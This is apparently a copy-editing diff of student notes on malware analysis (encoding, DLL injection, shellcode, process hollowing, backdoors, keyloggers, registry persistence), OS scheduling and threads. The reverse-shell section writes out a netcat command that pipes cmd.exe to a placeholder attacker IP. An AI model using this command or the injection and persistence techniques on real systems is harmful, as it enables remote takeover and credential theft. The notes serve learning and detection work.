#### Null-Preserving Single Byte XOR Encoding #### Null-Preserving Single Byte XOR Encoding
- Use NULL-preserving single byte encoding scheme - Use NULL-preserving single byte encoding scheme
- Rather than xor every byte, this has two rules - Rather than xor every byte, this has two rules
1. If byte is zero, or the key value then the byte is skipped 1. If byte is zero, or the key value then the byte is skipped
2. Else, xor 2. Else, xor
- Still reversible - Still reversible
```c ```c
@@ -62,22 +62,22 @@ while(c = fgetc(fi), c!=EOF)
} }
``` ```
- Relatively straight-forward to find this code in a disassembler - Relatively straightforward to find this code in a disassembler
- Search for `xor` instructions - Search for `xor` instructions
- There will be several (xor is used to set registers to zero) - There will be several (xor is used to set registers to zero)
- Look out for instructions that: - Look out for instructions that:
- XOR constant with a register - XOR constant with a register
- XOR a register with another different register - XOR a register with another different register
- Look out for small loops containing `XOR`s - Look out for small loops containing `XOR`s
Other encodings Other encodings
- Using addition and subtraction - Using addition and subtraction
- Using bit rotation - Using bit rotation
- ROT-n (the original ceaser cipher) - ROT-n (the original Caesar cipher)
- Multibyte (using a longer key) - Multibyte (using a longer key)
- Chained or loopback - Chained or loopback
- Encoding the data with itself - Encoding the data with itself
- Base64 encoded - Base64 encoded
### Base64 ### Base64
@@ -86,17 +86,17 @@ Base64 encoding is used to represent binary data in an ASCII string format and i
#### Encoding with Base64 #### Encoding with Base64
- It used 24-bit (3-byte) chunks - It uses 24-bit (3-byte) chunks
- The first character is placed in the most significant position - The first character is placed in the most significant position
- The second in the middle 8 bits - The second in the middle 8 bits
- The third in the least significant 8 bits - The third in the least significant 8 bits
- Bits are read in blocks of 6 - the number represented is used as an index to the base64 string. - Bits are read in blocks of 6 - the number represented is used as an index to the base64 string.
![1653066344.png](img/1653066344.png) ![1653066344.png](img/1653066344.png)
#### Identifying and Decoding Base64 #### Identifying and Decoding Base64
The best way to find this type of encoding is looking for the encoding string. The best way to find this type of encoding is to look for the encoding string.
`ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/` `ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/`
+51 -47
View File
@@ -2,14 +2,14 @@
- Malware will often exploit other processes on the system - Malware will often exploit other processes on the system
- Either already running, or by running them - Either already running, or by running them
- It does this to hide it’s activity - It does this to hide its activity
### Process Injection ### Process Injection
- With process injection, malware injects its own code into a running process - With process injection, malware injects its own code into a running process
- Malware execution then is not (easily) visible from outside - Malware execution then is not (easily) visible from outside
- Malware also gains privileges of the process it is injected into - Malware also gains privileges of the process it is injected into
- Common example is `DLL` injection - Common example is `DLL` injection
#### DLL Injection #### DLL Injection
@@ -23,45 +23,45 @@
- Use `VirtualAllocEx()` to allocate memory inside the process - Use `VirtualAllocEx()` to allocate memory inside the process
- Use `WriteProcessMemory()` to copy path to `DLL` into the process - Use `WriteProcessMemory()` to copy path to `DLL` into the process
- Use `CreateRemoteThread()` to create a new thread in the process - Use `CreateRemoteThread()` to create a new thread in the process
- Start `LoadLibrary()` as the thread routine - Start `LoadLibrary()` as the thread routine
- Pass the address of the `DLL` path as data to the thread - Pass the address of the `DLL` path as data to the thread
#### Direct Injection #### Direct Injection
- Related technique - Related technique
- Inject code directly rather than path to `DLL` - Inject code directly rather than path to `DLL`
- Use `VirtualAllocEx()` to allocate memory - Use `VirtualAllocEx()` to allocate memory
- Need to ensure its marked as executable - Need to ensure it’s marked as executable
- `WriteProcessMemory()` used to copy over code - `WriteProcessMemory()` used to copy over code
- `CreateRemoteThread()` used to start code - `CreateRemoteThread()` used to start code
- Harder to write code for direct injection - Harder to write code for direct injection
- Code isn’t loaded, so will need to find address of API functions itself - Code isn’t loaded, so will need to find address of API functions itself
#### Non-traditional Loading #### Non-traditional Loading
- Malware code isn’t alywas loaded in traditional fashion - Malware code isn’t always loaded in traditional fashion
- Could be delivered by making use of an exploit, or process injection - Could be delivered by making use of an exploit, or process injection
- Would be delivered as a small chunk of raw machine code - Would be delivered as a small chunk of raw machine code
- Not loaded in the traditional sense - Not loaded in the traditional sense
- No relocation, no dynamic linking - No relocation, no dynamic linking
- Just a raw blob of code that starts executing - Just a raw blob of code that starts executing
- Even the address is essentially random - Even the address is essentially random
- This is known as **shell-code** - This is known as **shell-code**
- Code knows where the stack is (using `ESP`) - Code knows where the stack is (using `ESP`)
- Can use this to create structures or store strings, by pushing the relevant values and capturing the address - Can use this to create structures or store strings, by pushing the relevant values and capturing the address
- This code has a problem - This code has a problem
- To do anything, the program is going to need to make Windows API calls - To do anything, the program is going to need to make Windows API calls
- Windows APU calls are normally made by making indirect calls to relevant implementation in the `DLL` - Windows API calls are normally made by making indirect calls to the relevant implementation in the `DLL`
- Normally Windows links the calls to the `DLL`s at load time but the malware code wasn’t ‘loaded’ - Normally Windows links the calls to the `DLL`s at load time but the malware code wasn’t ‘loaded’
- The malware code does not know where the `DLL`s have been loaded into memory - The malware code does not know where the `DLL`s have been loaded into memory
##### Finding API Routines ##### Finding API Routines
- Possible to load and call `DLL` programmatically using `LoadLibrary`/`GetProcAddress` - Possible to load and call `DLL` programmatically using `LoadLibrary`/`GetProcAddress`
- But even this requires us to know where those API functions are loaded - But even this requires us to know where those API functions are loaded
- Need to be able to find the address of (at least) these functions manually - Need to be able to find the address of (at least) these functions manually
- Possible to walk the data structures that Windows uses internally to find where the `DLL`s have been loaded into memory - Possible to walk the data structures that Windows uses internally to find where the `DLL`s have been loaded into memory
- Once we find `KERNAL32.DLL`, we can walk the PE file structure, and find the address of `LoadLibrary` and `GetProcAddress` - Once we find `KERNAL32.DLL`, we can walk the PE file structure, and find the address of `LoadLibrary` and `GetProcAddress`
- Can then use `LoadLibrary` and `GetProcAddress` to obtain access to other API functions - Can then use `LoadLibrary` and `GetProcAddress` to obtain access to other API functions
#### Thread Information Block #### Thread Information Block
@@ -74,46 +74,50 @@
- Including a pointer to the **Process Environment Block** (at an offset of `0x30`) - Including a pointer to the **Process Environment Block** (at an offset of `0x30`)
- `mov eax, fs:[0x30]` - `mov eax, fs:[0x30]`
- ```c - Example:
PEB *GetPEB()
{ ```c
_asm mov eax, fs:[0x30] PEB *GetPEB()
} {
``` _asm mov eax, fs:[0x30]
}
```
#### Modules List #### Modules List
- `PEB_LDR_DATA` structure points to a linked list containing each module - `PEB_LDR_DATA` structure points to a linked list containing each module
- List entry contains the module’s filename - List entry contains the module’s filename
- And the base address of where its been loaded - And the base address of where it’s been loaded
- Points to the start of the DOS file header - Points to the start of the DOS file header
- Can search this linked list until we find the `DLL` of interest - Can search this linked list until we find the `DLL` of interest
- ```c - Example:
typedef struct _LDR_DATA_TABLE_ENTRY {
PVOID Reserved1[2]; ```c
LIST_ENTRY InMemoryOrderLinks; typedef struct _LDR_DATA_TABLE_ENTRY {
PVOID Reserved2[2]; PVOID Reserved1[2];
PVOID DllBase; LIST_ENTRY InMemoryOrderLinks;
PVOID EntryPoint; PVOID Reserved2[2];
PVOID Reserved3; PVOID DllBase;
UNICODE_STRING FullDllName; PVOID EntryPoint;
BYTE Reserved4[8]; PVOID Reserved3;
PVOID Reserved5[3]; UNICODE_STRING FullDllName;
union { BYTE Reserved4[8];
ULONG CheckSum; PVOID Reserved5[3];
PVOID Reserved6; union {
}; ULONG CheckSum;
ULONG TimeDateStamp; PVOID Reserved6;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; };
``` ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
```
##### Process Hollowing ##### Process Hollowing
- Here a normal program is loaded using `CreateProcess` - Here a normal program is loaded using `CreateProcess`
- But it is created in a suspended state using the `CREATE_SUSPEND` flag - But it is created in a suspended state using the `CREATE_SUSPEND` flag
- Original code is removed, and malware code is copied in - Original code is removed, and malware code is copied in
- Look out for calls to `ZuUnmapViewOfSection`, `SetThreadContext` and `ResumeThread` - Look out for calls to `ZuUnmapViewOfSection`, `SetThreadContext` and `ResumeThread`
+66 -62
View File
@@ -5,7 +5,7 @@
*Downloaders* simply download another piece of malware from the internet and execute it on the local system. Downloaders are often packaged with an exploit. *Downloaders* simply download another piece of malware from the internet and execute it on the local system. Downloaders are often packaged with an exploit.
- Downloaders often use `URLDownloadToFileA` - Downloaders often use `URLDownloadToFileA`
- Followed by a called to `WinExec` - Followed by a call to `WinExec`
- To download and execute the new malware - To download and execute the new malware
- Are often called *droppers* - Are often called *droppers*
@@ -17,20 +17,20 @@ A launcher is any executable that installs malware for immediate or future cover
### Backdoors ### Backdoors
A *backdoor* is a type of malware that provides an attacker with remote access to a victims machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code. A *backdoor* is a type of malware that provides an attacker with remote access to a victim’s machine. Backdoor code often implements a full set of capabilities so when using a backdoor, attackers don't need to download additional malware or code.
- Common variants - Common variants
- Reverse Shells - Reverse Shells
- Remote Access Trojans (RATs) - Remote Access Trojans (RATs)
- Botnets - Botnets
- Commonly communicate over port 80 using `HTTP` - Commonly communicate over port 80 using `HTTP`
- `HTTP` is the most commonly used protocol for outgoing network traffic - `HTTP` is the most commonly used protocol for outgoing network traffic
- So it offers the malware the best chance of blending in to normal traffic - So it offers the malware the best chance of blending in to normal traffic
- Often provide a common set of functionality - Often provide a common set of functionality
- Manipulate registry keys - Manipulate registry keys
- Enumerate display windows - Enumerate display windows
- Create directories - Create directories
- Search for files - Search for files
- Can determine the functionality provided by looking at the Windows API functions imported - Can determine the functionality provided by looking at the Windows API functions imported
#### Reverse Shell #### Reverse Shell
@@ -38,11 +38,11 @@ A *backdoor* is a type of malware that provides an attacker with remote access t
A reverse shell is a connection that originates from an infected machine and provides attackers shell access to that machine. A reverse shell is a connection that originates from an infected machine and provides attackers shell access to that machine.
- The simplest type of backdoor - The simplest type of backdoor
- Provides attack with standard shell - Provides the attacker with a standard shell
- Offers same functionality as being logged into the machine - Offers same functionality as being logged into the machine
- Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attackers machine - Called a reverse shell because rather than the attacker connecting to the infected machine, the infected machine connects back to the attacker’s machine
- This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports. - This is done as the victim's machine is often sitting behind a firewall blocking incoming traffic on most ports.
- Whereas outgoing traffic on random high number ports is often unblocked - Whereas outgoing traffic on random high-numbered ports is often unblocked
- Either offered standalone or as part of a more sophisticated backdoor - Either offered standalone or as part of a more sophisticated backdoor
##### Creating a reverse shell ##### Creating a reverse shell
@@ -51,44 +51,48 @@ A reverse shell is a connection that originates from an infected machine and pro
- Can be created quite simply using the `netcat` program - Can be created quite simply using the `netcat` program
- This is done by setting up a listener on the attackers machine - This is done by setting up a listener on the attacker’s machine
- ```bash - Example:
nc -l -p 80
```
- Where `-l` is the listen flag and `-p` is the port flag to listen on 80 ```bash
nc -l -p 80
```
- Then netcat is run on the victims machine - Where `-l` is the listen flag and `-p` is the port flag to listen on 80
- ```bash - Then netcat is run on the victim’s machine
nc <attackers ip> 80 -e cmd.exe
```
- The `-e` option is the program to execute over the connection once the connection is established - Example:
- Tying std input and std output from the program to the network socket ```bash
nc <attackers ip> 80 -e cmd.exe
```
- The `-e` option is the program to execute over the connection once the connection is established
- Tying std input and std output from the program to the network socket
###### Using Windows API ###### Using Windows API
This can be done in two ways: basic and multi-threaded This can be done in two ways: basic and multi-threaded
The **basic** method is popular as is easy to write and achieves the same thing. The **basic** method is popular as it is easy to write and achieves the same thing.
It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure. It uses a call to `CreateProcess` and manipulates the `STARTUPINFO` structure.
1. First a socket to the remote server is established 1. First a socket to the remote server is established
2. That sockets standard streams are stored and spliced into `STARTUPINFO` 2. That socket’s standard streams are stored and spliced into `STARTUPINFO`
3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error is piped to the attacker 3. So that when `CreateProcess` is called with the `STARTUPINFO` passed in, standard input, output and error are piped to the attacker
The multithreaded approach is the same, except instead of tying the streams from command line directly to the socket, two threads sit inbetween (one for input, one for output) . These threads can be used to encrypt and decrypt data so is not sent in the clear. The multithreaded approach is the same, except instead of tying the streams from the command line directly to the socket, two threads sit in between (one for input, one for output). These threads can be used to encrypt and decrypt data so it is not sent in the clear.
- API calls `CreateThread` and `CreatePipe` should be looked for - API calls `CreateThread` and `CreatePipe` should be looked for
- The two pipes are needed to redirect input and output to the thread - The two pipes are needed to redirect input and output to the thread
- Two threads are needed - Two threads are needed
- One for reading from the stdin pipe and writing to the socket - One for reading from the stdin pipe and writing to the socket
- One for reading from the socket and writing to the stdout pipe - One for reading from the socket and writing to the stdout pipe
- Then the `CreateProcess` method can be used to tie the standard streams to the pipes instead of directly to the socket. - Then the `CreateProcess` method can be used to tie the standard streams to the pipes instead of directly to the socket.
### Remote Administration Tool (RAT) ### Remote Administration Tool (RAT)
@@ -100,7 +104,7 @@ The multithreaded approach is the same, except instead of tying the streams from
![1652975874.png](img/1652975874.png) ![1652975874.png](img/1652975874.png)
Server will poll the client for new commands - there is not a permanent connection (as to not arouse suspicion) Server will poll the client for new commands - there is not a permanent connection (so as not to arouse suspicion)
### Botnet ### Botnet
@@ -112,21 +116,21 @@ Server will poll the client for new commands - there is not a permanent connecti
| ------------------------------ | ------------------------------ | | ------------------------------ | ------------------------------ |
| Typically control fewer hosts | Infect millions | | Typically control fewer hosts | Infect millions |
| Used in targeted attacks | Used in mass attack | | Used in targeted attacks | Used in mass attack |
| Controlled on per-victim level | All zombies controlled as once | | Controlled on per-victim level | All zombies controlled at once |
### Credential Stealing ### Credential Stealing
- Attackers will go to great lengths to steal credentials - Attackers will go to great lengths to steal credentials
- Three general approaches - Three general approaches
- Programs that waits for a user to log in - Programs that wait for a user to log in
- Programs that dump information stored in Windows (e.g password hashes) - Programs that dump information stored in Windows (e.g password hashes)
- Programs that log keystrokes - Programs that log keystrokes
#### Windows Login #### Windows Login
- Windows enables you to extend the login mechanism - Windows enables you to extend the login mechanism
- In windows XP, this was done by *Graphical Identification* *and Authentication* (GINA) API - In Windows XP, this was done by the *Graphical Identification* *and Authentication* (GINA) API
- Later windows versions use *Credential Provider* - Later Windows versions use *Credential Provider*
- Possible to use these to install credential stealers by pretending to be a credential provider - Possible to use these to install credential stealers by pretending to be a credential provider
Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `dll` to a malicious one. Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `dll` to a malicious one.
@@ -142,27 +146,27 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
### Keyloggers ### Keyloggers
- Intercepting Windows login or hash dumping will only provide details of the username and password to log into the computer - Intercepting Windows login or hash dumping will only provide details of the username and password to log into the computer
- Will not provide details of other resources - Will not provide details of other resources
- Alternative approach is to log user key presses - Alternative approach is to log user key presses
- This will capture any password typed into the system - This will capture any password typed into the system
- Keyloggers can be implemented in both kernel space and user space - Keyloggers can be implemented in both kernel space and user space
- Kernel based is very difficult to detected with user level applications - Kernel-based is very difficult to detect with user-level applications
- Frequently used as part of a root kit - Frequently used as part of a rootkit
- Act as a keyboard driver to capture keystrokes bypasses user-space programs and protections - Acting as a keyboard driver to capture keystrokes bypasses user-space programs and protections
#### User-space keyloggers #### User-space keyloggers
- Windows API provides two ways to implement a keylogger in user-space - Windows API provides two ways to implement a keylogger in user-space
- Hooking - get windows to notify the malware every time a key is pressed - Hooking - get Windows to notify the malware every time a key is pressed
- Hooking typically makes use of `SetWindowsHookEx()` - Hooking typically makes use of `SetWindowsHookEx()`
- Can alter key presses as well - Can alter key presses as well
- Typically will include `.exe` which will intiate the hook function - Typically will include an `.exe` which will initiate the hook function
- And a `dll` to handle the logging - And a `dll` to handle the logging
- This `dll` is injected to other processes on the system - This `dll` is injected to other processes on the system
- Polling - malware interrogrates Windows to see if a specific key is pressed - Polling - malware interrogates Windows to see if a specific key is pressed
- Make use of the `GetAsyncKeyState()` API function which returns a boolean - Make use of the `GetAsyncKeyState()` API function which returns a boolean
- All the keys are iterated through to see what specific key is pressed - All the keys are iterated through to see what specific key is pressed
- `GetForegroundWindow()` - shows window title - `GetForegroundWindow()` - shows window title
###### Identifying Keyloggers ###### Identifying Keyloggers
@@ -180,7 +184,7 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
- Various places in the Windows Registry that can be used to install malware permanently - Various places in the Windows Registry that can be used to install malware permanently
- Most popular is to register under: - Most popular is to register under:
- `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` - `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
- Tools available that can show all the programs that will automatically run on your system - Tools available that can show all the programs that will automatically run on your system
- Note that the mechanisms available change as Windows develops - Note that the mechanisms available change as Windows develops
@@ -189,7 +193,7 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
- One option is the image File Execution Options in the registry - One option is the image File Execution Options in the registry
- Aimed at letting you debug a program - Aimed at letting you debug a program
- Set at: - Set at:
- `HKLM\Software\Microsoft\Windows NT\CurrentVersion\ImageFileExecution Options\{exe}` - `HKLM\Software\Microsoft\Windows NT\CurrentVersion\ImageFileExecution Options\{exe}`
- Can set a key here called debugger which contains the full path to the debugger (or your malware) - Can set a key here called debugger which contains the full path to the debugger (or your malware)
- Set this on a program that is likely to run and the malware will be launched when the program is run - Set this on a program that is likely to run and the malware will be launched when the program is run
- Can also be used for malware analysis - Can also be used for malware analysis
@@ -197,7 +201,7 @@ Place a piece of code between `winlogin.exe` and `magina.dll`. By changing the `
###### SVCHOST DLLs ###### SVCHOST DLLs
- Malware often installed as a Windows service - Malware often installed as a Windows service
- But typically requires implementing as a `exe` - But typically requires implementing as an `exe`
- However, Windows provides `svchost.exe` that lets you implement a service as a `dll` - However, Windows provides `svchost.exe` that lets you implement a service as a `dll`
- Many Windows services are implemented as a `DLL` using `svchost.exe` - Many Windows services are implemented as a `DLL` using `svchost.exe`
- Causes the malware to blend into the process list and registry better - Causes the malware to blend into the process list and registry better
+36 -32
View File
@@ -1,50 +1,52 @@
05/10/20 05/10/20
--- ---
The OS is responsible for *managing* and *scheduling processes* The OS is responsible for *managing* and *scheduling processes*
>Decide when to admit processes to the system (new -> ready) > Decide when to admit processes to the system (new -> ready)
> >
>Decide which process to run next (ready -> run) > Decide which process to run next (ready -> run)
> >
>Decide when and which processes to interrupt (running -> ready) > Decide when and which processes to interrupt (running -> ready)
It relies on the *scheduler* (dispatcher) to decide which process to run next, which uses a scheduling algorithm to do so. It relies on the *scheduler* (dispatcher) to decide which process to run next, which uses a scheduling algorithm to do so.
The type of algorithm used by the scheduler is influenced by the type of operating system e.g. real time vs batch. The type of algorithm used by the scheduler is influenced by the type of operating system, e.g. real-time vs batch.
**Long Term** **Long Term**
- Applies to new processes and controls the degree of multi-programming by deciding which processes to admit to the system when: - Applies to new processes and controls the degree of multi-programming by deciding which processes to admit to the system when:
- A good mix of CPU and I/O bound processes is favourable to keep all resources as bust as possible - A good mix of CPU and I/O bound processes is favourable to keep all resources as busy as possible
- Usually absent in popular modern OS - Usually absent in popular modern OS
**Medium Term** **Medium Term**
>Controls swapping and the degree of multi-programming > Controls swapping and the degree of multi-programming
**Short Term** **Short Term**
- Decide which process to run next - Decide which process to run next
- Manages the *ready queue* - Manages the *ready queue*
- Invoked very frequency, hence must be fast - Invoked very frequently, hence must be fast
- Usually called in response to *clock interrupts*, *I/O interrupts*, or *blocking system calls* - Usually called in response to *clock interrupts*, *I/O interrupts*, or *blocking system calls*
![Image](assets/1.png) ![Image](assets/1.png)
**Non-preemptive** processes are only interrupted voluntarily (e.g. I/O operation or "nice" system call `yield()`) **Non-preemptive** processes are only interrupted voluntarily (e.g. an I/O operation or the "nice" system call `yield()`)
>Windows 3.1 and DOS were non-preemptive > Windows 3.1 and DOS were non-preemptive
> >
>The issue with this is if the process in control goes wrong or gets stuck in a infinite loop then the CPU will never regain control. > The issue with this is that if the process in control goes wrong or gets stuck in an infinite loop, the CPU will never regain control.
**Preemptive** processes can be interrupted forcefully or voluntarily **Pre-emptive** processes can be interrupted forcefully or voluntarily
>This required context switches which generate *overhead*, too many of them show me avoided. > This requires context switches, which generate *overhead*. Too many of them should be avoided.
> >
>Prevents processes from monopolising the CPU > Prevents processes from monopolising the CPU
> >
>Most popular modern OS use this kind. > Most popular modern OS use this kind.
Overhead - wasted CPU cycles Overhead - wasted CPU cycles
How can we objectively critic the OS? How can we objectively critique the OS?
**User Oriented criteria** **User-Oriented Criteria**
*Response time* minimise the time between creating the job and its first execution (time between clicking the button and it starting) *Response time* minimise the time between creating the job and its first execution (time between clicking the button and it starting)
*Turnaround time* minimise the time between creating the job and finishing it *Turnaround time* minimise the time between creating the job and finishing it
*Predictability* minimise the variance in processing times *Predictability* minimise the variance in processing times
@@ -57,6 +59,7 @@ How can we objectively critic the OS?
> Are some processes kept waiting excessively long - **starvation** > Are some processes kept waiting excessively long - **starvation**
### Different types of Scheduling Algorithms ### Different types of Scheduling Algorithms
[NOTE: FCFS = FIFO] [NOTE: FCFS = FIFO]
**First come first serve** **First come first serve**
@@ -64,27 +67,27 @@ Concept: a non-preemptive algorithm that operates as a strict queuing mechanism
| Pros | Cons | | Pros | Cons |
| ----------- | ----------- | | ----------- | ----------- |
| Positional fairness | Favours long processes over short ones (think supermarket checkout) || | | Positional fairness | Favours long processes over short ones (think supermarket checkout) |
| Easy to implement | Could compromise resource utilisation | | Easy to implement | Could compromise resource utilisation |
![Image](assets/2.png) ![Image](assets/2.png)
**Shortest job first** **Shortest job first**
A non-preemptive algorithm that starts processes in order of ascending processing time using a provided estimate of the processing A non-pre-emptive algorithm that starts processes in order of ascending processing time using a provided estimate of the processing time.
| Pros | Cons | | Pros | Cons |
| ----------- | ----------- | | ----------- | ----------- |
| Always results an optimal turnaround time | Starvation might occur | | Always results in an optimal turnaround time | Starvation might occur |
| - | Fairness and predictability are compromised | | - | Fairness and predictability are compromised |
| - | Processing times need to be known in advanced | | - | Processing times need to be known in advance |
![Image](assets/3.png) ![Image](assets/3.png)
**Round Robin** **Round Robin**
A preemptive version of FCFS that focuses context switches at periodic intervals or time slices A pre-emptive version of FCFS that focuses context switches at periodic intervals or time slices.
>Processes run in order that they were added to the queue. > Processes run in order that they were added to the queue.
>Processes are forcefully interrupted by the timer. > Processes are forcefully interrupted by the timer.
| Pros | Cons | | Pros | Cons |
| ----------- | ----------- | | ----------- | ----------- |
@@ -93,20 +96,20 @@ A preemptive version of FCFS that focuses context switches at periodic intervals
| - | Can reduce to FCFS | | - | Can reduce to FCFS |
Exam 2013: Round Robin is said to favour CPU bound processes over I/O bound processes. Explain why this may be the case. Exam 2013: Round Robin is said to favour CPU bound processes over I/O bound processes. Explain why this may be the case.
>I/O processes will spend a lot of their allocated time waiting for data to come back from memory, therefore less processing can occur before the time slice runs out. > I/O processes will spend a lot of their allocated time waiting for data to come back from memory, therefore less processing can occur before the time slice runs out.
If the time slice is only used partially the next process starts immediately If the time slice is only used partially the next process starts immediately
The length of the time slice must be carefully considered. The length of the time slice must be carefully considered.
>A small time slice (~ 1ms) gives a good response time. > A small time slice (~ 1ms) gives a good response time.
>A large time slice (~ 1000ms) gives a high throughput. > A large time slice (~ 1000ms) gives a high throughput.
![Image](assets/4.png) ![Image](assets/4.png)
**Priority Queue** **Priority Queue**
A preemptive algorithm that schedules processes by priority A pre-emptive algorithm that schedules processes by priority.
>A round robin is used for processes with the same priority level > A round robin is used for processes with the same priority level
>The process priority is saved in the process control block > The process priority is saved in the process control block
| Pros | Cons | | Pros | Cons |
| ----------- | ----------- | | ----------- | ----------- |
@@ -118,7 +121,8 @@ You could give higher priority processes a larger time slice to improve efficien
![Image](assets/5.png) ![Image](assets/5.png)
Exam Q 2013: Which algorithms above lead to starvation? Exam Q 2013: Which algorithms above lead to starvation?
>Shortest job first and highest priority first. > Shortest job first and highest priority first.
![Image](assets/6.png) ![Image](assets/6.png)
![Image](assets/7.png) ![Image](assets/7.png)
+42 -46
View File
@@ -4,20 +4,20 @@
A process consists of two **fundamental** units A process consists of two **fundamental** units
1. Resources 1. Resources
- A logical address space containing the process image (program, data, heap, stack) - A logical address space containing the process image (program, data, heap, stack)
- Files, I/O devices, I/O channels - Files, I/O devices, I/O channels
2. Execution trace e.g. an entity that gets executed 2. Execution trace e.g. an entity that gets executed
A process can share its resources between multiple execution traces, e.g multiple threads running in the same resource environment. A process can share its resources between multiple execution traces, e.g. multiple threads running in the same resource environment.
![Image](assets/9.png) ![Image](assets/9.png)
Every thread has its own *execution context* (e.g. program counter, stack, registers). Every thread has its own *execution context* (e.g. program counter, stack, registers).
All threads have **access** to the process' **shared resources** All threads have **access** to the process' **shared resources**
>e.g. Files; if one thread opens a file then all threads have access to it > e.g. Files; if one thread opens a file then all threads have access to it
> >
>Same with global variables, memory etc > Same with global variables, memory etc
Similar to processes, threads have: Similar to processes, threads have:
**States**, **transitions** and a **thread control block** **States**, **transitions** and a **thread control block**
@@ -26,92 +26,88 @@ Similar to processes, threads have:
The *registers*, *stack* and *state* are all specific to the registers. When a context switch occurs they must be stored in the **thread control block**. The *registers*, *stack* and *state* are all specific to the registers. When a context switch occurs they must be stored in the **thread control block**.
Threads incur less overhead to create/terminate/switch processes. This is because the address space remains the same for threads of the same process. Threads incur less overhead to create, terminate or switch than processes. This is because the address space remains the same for threads of the same process.
>When switching from thread A to thread B, the computer doesn't need to worry about updating the memory management unit as they're using the same memory layout. > When switching from thread A to thread B, the computer doesn't need to worry about updating the memory management unit as they're using the same memory layout.
> >
>This makes switching threads very quick > This makes switching threads very quick
Some CPU's have direct **hardware support** for **multi-threading**. Some CPUs have direct **hardware support** for **multi-threading**.
>With hyper threading and multi-threading, the thread's execution context isn't saved to the thread control block. Instead the CPU stops using one thread and starts using another. > With hyper threading and multi-threading, the thread's execution context isn't saved to the thread control block. Instead the CPU stops using one thread and starts using another.
> >
>This decreases overhead as the execution context doesn't need to be saved and reloaded. > This decreases overhead as the execution context doesn't need to be saved and reloaded.
1. **Inter-thread communication** is easier and faster that **inter-process** communication (threads share memory by default) 1. **Inter-thread communication** is easier and faster than **inter-process** communication (threads share memory by default)
2. **No protection boundaries** are required in the address space (threads are cooperating, they belong to the same user and have the same goal) 2. **No protection boundaries** are required in the address space (threads are cooperating, they belong to the same user and have the same goal)
3. Synchronisation has to be considered carefully. 3. Synchronisation has to be considered carefully.
If you opened word and excel, you wouldn't want them running on threads as you don't want word to have access to the memory excel is accessing. However if you just had word open the spell check and graphics libraries would all run on threads as they work towards a common goal. If you opened Word and Excel, you wouldn't want them running on threads as you don't want Word to have access to the memory Excel is accessing. However, if you just had Word open, the spellcheck and graphics libraries would all run on threads as they work towards a common goal.
### Why use threads ### Why use threads
1. Multiple **related activities** apply to the **same resources**, these resources should be accessible. 1. Multiple **related activities** apply to the **same resources**, these resources should be accessible.
2. Processes will often contain multiple **blocking tasks** 2. Processes will often contain multiple **blocking tasks**
1. I/O operations (thread blocks, interrupt marks completion) 1. I/O operations (thread blocks, interrupt marks completion)
2. Memory access: pages faults are result in blocking 2. Memory access: page faults result in blocking
Such activities should be carried out in parallel on threads. e.g. web-servers, word processors, processing large data volumes etc Such activities should be carried out in parallel on threads, e.g. web servers, word processors and processing large data volumes.
**User** threads - happen inside the user space, the OS doesn't need to do anything. **User** threads - happen inside the user space, the OS doesn't need to do anything.
>**Thread management** (creating, destroying, scheduling, thread control block manipulation) is carried out in user space with the help of a user library. > **Thread management** (creating, destroying, scheduling, thread control block manipulation) is carried out in user space with the help of a user library.
> >
>The process maintains a thread table managed by the run-time system without the kernel's knowledge (similar to a process table and used for thread switching) > The process maintains a thread table managed by the run-time system without the kernel's knowledge (similar to a process table and used for thread switching)
**Kernel** threads - ask the OS to create a tread for the user and give it to the user. **Kernel** threads - Ask the OS to create a thread for the user and give it to the user.
**Hybrid** implementations - is what is used in windows 10 **Hybrid** implementations - Used in Windows 10
![Image](assets/d.png)
**Pros and cons of user threads** **Pros and cons of user threads**
| Pros | Cons | | Pros | Cons |
| ----------- | ----------- | | ----------- | ----------- |
| Threads in user space don't require mode switches | Blocking system calls suspend all running threads | | Threads in user space don't require mode switches | Blocking system calls suspend all running threads |
| Full control over the thread scheduler | No true parallelism (the processes still scheduled on a single CPU) | | Full control over the thread scheduler | No true parallelism (the process is still scheduled on a single CPU) |
| OS independent | Clock interrupts (user threads are non-preemptive) | | OS-independent | Clock interrupts (user threads are non-pre-emptive) |
| - | Page faults result in blocking the process| | - | Page faults result in blocking the process|
The user threads don't share the memory management unit therefore if a thread tries to access memory that isn't loaded in the MMU then a page fault will occur, these occur often. The user threads don't share the memory management unit. Therefore, if a thread tries to access memory that isn't loaded in the MMU, a page fault will occur. These occur often.
**Kernel Threads** **Kernel Threads**
The kernel manages the threads, user application accesses threading facilities through **API** and **system calls** The kernel manages the threads. The user application accesses threading facilities through an **API** and **system calls**.
>The **thread table** is in the kernel, containing the thread control blocks. > The **thread table** is in the kernel, containing the thread control blocks.
> >
>If a thread blocks, the kernel chooses a thread from the same or different process. > If a thread blocks, the kernel chooses a thread from the same or different process.
Advantages: Advantages:
>**True parallelism** can be achieved > **True parallelism** can be achieved
>No run time system needed > No run-time system needed
However frequent **mode switches** take place, resulting in a lower performance. However, frequent **mode switches** take place, resulting in lower performance.
![Image](assets/E.png) ![Image](assets/E.png)
Kernel threads are slower to create and sync that user level however user level cannot exploit parallelism. Kernel threads are slower to create and synchronise than user-level threads. However, user-level threads cannot exploit parallelism.
**Hybrid Implementation** **Hybrid Implementation**
>User threads are **multiplexed** onto kernel threads > User threads are **multiplexed** onto kernel threads
> >
>Kernel sees and schedules the kernel threads > Kernel sees and schedules the kernel threads
> >
